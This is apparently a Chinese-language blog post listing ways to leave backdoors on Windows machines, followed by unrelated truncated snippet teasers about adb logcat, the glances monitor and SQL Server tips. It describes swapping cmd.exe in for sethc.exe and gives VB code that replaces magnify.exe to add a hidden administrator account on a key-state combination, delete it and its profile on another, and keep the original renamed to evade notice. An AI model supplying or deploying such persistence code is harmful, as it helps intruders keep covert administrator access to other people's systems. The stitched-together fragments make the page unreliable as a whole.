學到的幾個留下後門的小方法。
1.粘滯帶後門
這個應該是大家都比較熟悉的了,開啟粘滯帶就是連按5下shift 會預設開啟sethc.exe這個小工具。直接將cmd.exe替換掉sethc.exe這樣就算乙個小後門了。
不過貌似用這個的人確實很多,所以出現了網上許多人的加密版本。
2.其他系統工具的利用
其實其他快捷鍵能撥出的系統工具一般都是可以利用的。這裡看到的是利用系統的放大鏡功能,就是magnify.exe。
利用getkeystate()這個函式檢查鍵盤上的幾個特殊鍵的狀態,來執行shell命令新增系統賬號。
利用vb編寫一段小程式就可以了,屆時替換掉系統中的magnify.exe就可以了,不過記得把原程式改名,不然不能啟動一下就被發現了。比如將原程式寫成mag.exe
vb**:
declare function getkeystate lib 「user32″ (byval nvirtkey as long) as integer
sub main()
if getkeystate(20) = 1 then
if getkeystate(144) = 1 then
if getkeystate(145) = 1 then
shell (「net1 user king king /add」)
shell (「net1 localgroup administrators king /add」)
elseif getkeystate(145) = 0 then
shell (「net1 user king /del」)
shell (「cmd.exe /c rd /s /q \\.\\c:\docume~1\king「)
elseif getkeystate(144) = 1 then
shell (「mag.exe」)
elseif getkeystate(20) = 1 then
shell (「mag.exe」)
end if
end if
end if
end sub
adb工具小技巧
最進學到了adb工具的一些小技巧,記錄在此。作業系統是windows用。非阻塞logcat 使用 d引數,可以在讀完所有log後返回,而不會一直等待,在自動化較有用。例如 adb logcat d s log 得到filter為 的日誌,存入 log,然後返回。用grep過濾log windows也...
利用系統監控工具 glances
glances 是利用python語言開發,的監控工具,與linux命令中的top最為相似,但是比top命令更齊全.主要用來監控 cpu 使用 率 記憶體 使用 情況 核心 統計 資訊 和 執行 佇列 資訊 磁碟 i o 速度 傳輸 和 讀 寫 比率 檔案 系統 中的 可用 空間 磁碟 介面卡 網路...
小技巧 小工具列表
1.建立udl檔案可構造連線字串。2.完全控制gac檔案目錄 3.清除資料庫日誌檔案 backup log sts pcc server 1 with no log 收縮資料庫 dbcc shrinkdatabase sts pcc server 1 4.sql server資料庫的壓縮處理 5.u...